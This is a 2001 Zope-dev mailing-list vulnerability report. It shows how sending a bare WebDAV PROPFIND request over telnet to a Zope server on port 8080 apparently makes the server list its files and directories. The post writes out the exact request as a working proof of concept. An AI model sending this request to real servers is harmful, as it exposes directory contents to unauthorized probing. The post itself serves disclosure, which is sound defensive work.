[Zope-dev] Vulnerability: attacking can get file list and directory

ALife ALife" <buginfo@inbox.ru
Sun, 23 Sep 2001 18:04:56 +0000 (GMT)

Previous message: [Zope-dev] New: Cross Site Scripting vulnerability
Next message: [Zope-dev] Vulnerability: attacking can get file list and directory
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Vulnerability: attacking can get file list and directory
Tested on Win32 platform

Example:
telnet zopeserver 8080
PROPFIND / HTTP/1.0
<enter>
<enter>
<enter>

< list files and directory >

This tested on my site:
security.instock.ru 8080

Previous message: [Zope-dev] New: Cross Site Scripting vulnerability
Next message: [Zope-dev] Vulnerability: attacking can get file list and directory
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]